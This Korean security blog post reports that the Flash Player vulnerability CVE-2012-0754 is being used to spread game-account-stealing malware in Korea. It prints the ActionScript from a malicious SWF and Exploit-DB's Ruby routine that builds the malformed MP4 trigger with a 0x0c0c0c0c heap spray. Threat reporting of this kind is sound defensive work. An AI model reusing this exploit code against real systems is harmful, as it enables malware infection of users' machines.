또 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2012-0754)

국내에서 전파되는 온라인게임핵 악성코드 전파용 취약점이 또 하나가 새롭게 추가가 되었습니다.
CVE-2012-0754 : http://www.exploit-db.com/exploits/18572/

Exploit-DB 사이트에 올라오자 마자 바로 자기네들에 맞게 수정하여 전파하네요. 아래는 이번에 국내에서 발견된 해당 취약점과 관련된 SWF 파일 내부에 작성되어 있는 액션 스크립트 입니다.

이전에 발견된 CVE-2011-2140 취약점과 아주 유사하게 구성되어 있으며 취약점과 관련된 MP4 파일명도 CVE-2011-2140 취약점은 ea.jpg 그리고 이번에 나온 CVE-2012-0754 취약점은 ee.jpg 로 사용하고 있습니다.

CVE-2011-2140 취약점 관련 이전 글 : https://jjoon.net/page/2011/09/09/adobe-flash-player-cve-2011-2140-취약점-간단-분석/

package
{
        public class Exploit extends flash.display.Sprite
        {
                public function Exploit()
                {
                        Gondad = 'pdRyrW8PbLGWI6Pv';
                        greeting = new flash.text.TextField();
                        greeting.text = 'Loading...';
                        greeting.x = 100;
                        greeting.y = 100;
                        addChild(greeting);
                        MyVideo = new flash.media.Video();
                        addChild(MyVideo);
                        MyNC = new flash.net.NetConnection();
                        MyNC.connect(null);
                        MyNS = new flash.net.NetStream(MyNC);
                        MyVideo.attachNetStream(MyNS);
                        MyNS.play('ee.jpg');
                }
                public var MyNC:flash.net.NetConnection;
                public var MyNS:flash.net.NetStream;
                public var MyVideo:flash.media.Video;
                private var greeting:flash.text.TextField;
                internal var Gondad:* = "pdRyrW8PbLGWI6Pv";
        }
}

Exploit-DB 사이트에 올라와 있는 취약점과 관련된 MP4 파일을 생성하는 코드는 아래와 같습니다.

def create_mp4(target)
        mp4 = ""
        mp4 << "\x00\x00\x00\x18"
        mp4 << "ftypmp42"
        mp4 << "\x00\x00\x00\x00"
        mp4 << "mp42isom"
        mp4 << "\x00\x00\x00\x0D"
        mp4 << "cprt"
        mp4 << "\x00\xFF\xFF\xFF"
        mp4 << "\x00\x00\x00\x00"
        mp4 << "\x0c\x0c\x0c\x0c" * 2586
        return mp4
end

그리고 아래는 이번에 국내에서 발견된 관련 MP4 파일 입니다. "yqoo" 부분은 계속해서 변경시키며 진단을 우회하고자 노력하고 있는 것으로 보입니다.

또 많은 사용자가 감염이 되겠군요…… 🙁

답글 남기기

이메일 주소를 발행하지 않을 것입니다. 필수 항목은 *(으)로 표시합니다